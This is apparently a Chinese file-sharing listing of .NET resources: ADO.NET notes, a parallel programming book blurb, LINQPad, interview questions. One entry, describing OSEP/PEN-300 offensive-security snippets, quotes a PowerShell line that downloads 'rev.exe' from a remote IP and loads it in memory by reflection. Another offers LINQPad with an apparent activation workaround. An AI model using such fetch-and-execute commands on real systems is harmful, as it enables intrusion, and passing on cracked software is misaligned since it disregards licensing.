ASP.net: ADO的五大对象: Connection 连接对象 Command 命令对象,指示要执行的命令和存储过程! DataReader是一个向前的只读的数据流。 DataAdapter是功能强大的适配合器,支持增删改查的功能 DataSet是一个数据级对象,相当于内存中的一张表或多张表!(asp中是recordset)
2023-01-06 17:55:25 57KB ado.net的五大对象 ado .net asp
1
ExcelCreator5 for .net 帮助文档
2023-01-06 11:07:08 767KB ExcelCreator5 for .net 帮助文档
1
Apress, 2010 ,如何用.net来实现并行计算,本书将带你一探究竟 Parallel programming has been revolutionised in .NET 4 providing, for the first time, a standardised and simplified method for creating robust, scalable and reliable multi-threaded applications. The Parallel Programming features of .NET 4 allow the programmer to create applications that harness the power of multi-core and multi-processor machines. Simpler to use and more powerful than “classic” .NET threads, parallel programming allows the developer to remain focused on the work an application needs to perform. In Pro .NET 4 Parallel Programming in C#, Adam Freeman presents expert advice that guides you through the process of creating concurrent C# applications from the ground up. You’ll be introduced to .NET’s parallel programming features, both old and new, discover the key functionality that has been introduced in .NET 4, and learn how you can take advantage of the power of multi-core and multi-processor machines with ease. Pro .NET 4 Parallel Programming in C# is a reliable companion that will remain with you as you explore the parallel programming universe, elegantly and comprehensively explaining all aspects of parallel programming, guiding you around potential pitfalls and providing clear-cut solutions to the common problems that you will encounter. What you’ll learn * Develop scalable and robust parallel applications in C#. * Design, test and use parallel algorithms and data structures. * Understand and implement common parallel design patterns. * Avoid common anti-patterns and problems. * Use Visual Studio to verify and debug parallel applications. amazon link:http://www.amazon.com/exec/obidos/ASIN/1430229675/buythisbooks-20
2023-01-05 23:25:06 4.63MB .net c# pdf Apress
1
OSEP代码片段代码示例按原样提供,没有任何形式的保证。 基于进攻性安全的PEN-300课程。 OSEP代码段的类和方法代码示例按原样提供,没有任何形式的保证。 基于进攻性安全的PEN-300课程。 类和方法是公共的,因此大多数二进制文件应允许如下所示的反射加载。 $ data =(新对象System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')$ assem = [System.Reflection.Assembly] :: Load($ data)[rev。程序] :: Main(“” .. Split())内容摘录名称说明AppLocker绕过PowerShell Runspace(C#)的基本二进制文件
2023-01-05 19:24:26 76KB .NET Miscellaneous
1
asp.net中绑定TextBox回车事件的解决方法。
2023-01-05 17:44:56 3KB 绑定 回车 textbox C# .net
1
测试pdf转图片无限制,无水印
2023-01-05 01:08:40 13.04MB .net 安全 microsoft
1
内容索引:VC/C++源码,系统相关,目录  vc++.net获取当前运行程序所在的目录,自动查找自身所在的目录路径,枚举并显示出来,虽然是个简单的小例子,的朋友可能对其方方面面还是很陌生,希望通过这些超简单的小例子,有帮助。
2023-01-04 21:21:53 12KB VC/MFC源代码 Windows系统源代码
1
有关执行高级MIDI内容的深入指南。 包括一个演示鼓步骤音序器和文件切片器
2023-01-04 14:11:16 244KB C# .NET All-Topics Dev
1
很好用的 .NET开发的小软件。 最新的 LINQPad 7 版本 使用方法: 1. 下载后解压 2. 打开《LINQPad7-x64.exe》或《LINQPad7-x86.exe》(根据自己系统位数选择,一般都是第一个)。 3. 这时候还是未激活状态,这时候关闭软件,再重新打开,就是激活状态了。(就是说需要打开两次)
2023-01-04 13:22:53 31.9MB .NET开发操练场
1
很经典,很有用的面试题,几乎涵盖了初级程序员和中高级程序员技术壁垒的所有问题与面试
2023-01-04 12:15:16 803KB .net 面试 高级 C#
1